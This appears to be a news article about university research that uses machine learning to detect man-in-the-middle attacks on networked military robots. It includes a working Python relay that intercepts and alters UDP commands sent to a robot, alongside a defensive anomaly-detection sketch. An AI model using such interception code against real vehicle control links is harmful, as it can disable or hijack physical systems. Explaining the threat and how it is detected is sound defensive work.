New AI system can identify MitM attacks against robotic vehicles

Researchers at Charles Sturt University and the University of South Australia have created an algorithm to identify and stop man-in-the-middle (MitM) attacks on unmanned military robots.

A MitM attack is a type of intrusion in which an attacker intercepts the data flowing between two parties, in this case the robot and its authorized controllers, either to eavesdrop on the traffic or to inject fake data into the stream.

Such attacks can prevent an autonomous vehicle from operating, alter the instructions it receives, or, in the worst case, seize control and feed the robot harmful commands. A simple sketch of what this interception can look like follows below.
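To make the threat concrete, the following sketch shows how an unauthenticated command link could be intercepted and tampered with. Everything in it is illustrative: the UDP transport, the addresses and ports, the JSON message layout, and the `linear_velocity` field are assumptions made for the example, not details of the researchers' test setup.

```python
# Minimal sketch of a MitM relay on a hypothetical, unauthenticated UDP
# command link between a controller and a robot. Illustrative only; the
# addresses, ports, and JSON message format are assumptions.
import json
import socket

CONTROLLER_FACING = ("0.0.0.0", 9000)   # attacker listens where the controller sends
ROBOT_ADDR = ("192.168.1.50", 9000)     # real robot endpoint (assumed)

def tamper(payload: bytes) -> bytes:
    """Intercept a command and inject altered data into the stream."""
    try:
        cmd = json.loads(payload)
    except json.JSONDecodeError:
        return payload                    # pass through anything unparseable
    cmd["linear_velocity"] = 0.0          # e.g. silently stop the vehicle
    return json.dumps(cmd).encode()

def relay() -> None:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(CONTROLLER_FACING)
    while True:
        packet, _src = sock.recvfrom(4096)        # eavesdrop on controller traffic
        sock.sendto(tamper(packet), ROBOT_ADDR)   # forward the modified command

if __name__ == "__main__":
    relay()
```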

Professor Anthony Finn, who took part in the research, notes that “because the robot operating system (ROS) is so highly networked, it is extremely susceptible to data breaches and electronic hijacking.”

“The advent of Industry 4.0, marked by the evolution in robotics, automation, and the Internet of Things, has demanded that robots work collaboratively, where sensors, actuators, and controllers need to communicate and exchange information with one another via cloud services.”

“The downside of this is that it makes them highly vulnerable to cyberattacks.”

Using machine learning methods, the researchers created an algorithm that can quickly identify these intrusion attempts and shut them down.
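As a rough illustration of the idea only, and not the researchers' published model, the sketch below flags anomalous traffic windows with a generic machine learning detector. The choice of scikit-learn's IsolationForest, the traffic features, and the synthetic numbers are all assumptions for the example; reacting to an anomaly by cutting the link stands in for "shutting the attempt down."

```python
# Generic sketch of machine-learning-based detection of tampered robot
# network traffic. Feature choices, thresholds, and the IsolationForest
# detector are illustrative assumptions, not the published algorithm.
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(0)

# Features per time window: [packets/s, mean payload bytes, mean inter-arrival ms]
normal_traffic = rng.normal(loc=[50, 120, 20], scale=[5, 10, 2], size=(1000, 3))
mitm_traffic = rng.normal(loc=[90, 200, 11], scale=[8, 25, 2], size=(20, 3))

# Fit on traffic assumed to be clean, then score new windows.
detector = IsolationForest(contamination=0.01, random_state=0).fit(normal_traffic)

for window in np.vstack([normal_traffic[:5], mitm_traffic[:5]]):
    label = detector.predict(window.reshape(1, -1))[0]   # -1 = anomalous
    if label == -1:
        print("Suspicious window, shutting down link:", np.round(window, 1))
```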
